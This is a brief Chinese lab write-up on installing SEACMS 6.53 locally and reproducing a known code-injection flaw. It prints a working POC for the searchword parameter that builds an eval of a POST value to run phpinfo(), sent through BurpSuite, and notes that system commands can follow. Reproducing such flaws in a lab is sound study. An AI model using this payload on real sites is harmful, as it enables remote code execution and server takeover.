海洋CMS(SEACMS 6.53)环境搭建及漏洞利用
摘要: mysql+php 用phpstudy即可下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中包里有安装说明0x01 开始复现安装完毕后进入主页设置代理127.0.0.1 8080端口…… ...
mysql+php 用phpstudy即可 下载好之后开始搭建, 将uploads里的所有文件复制到网站服务器中 包里有安装说明
0x01 开始复现 安装完毕后进入主页
设置代理127.0.0.1 8080端口, 打开BurpSuite抓包
这里直接用网上的poc searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo(); 我们复制过来看看效果
改好直接forward 过我们看下效果
0x02 漏洞利用 进一步利用,可以执行系统命令
|
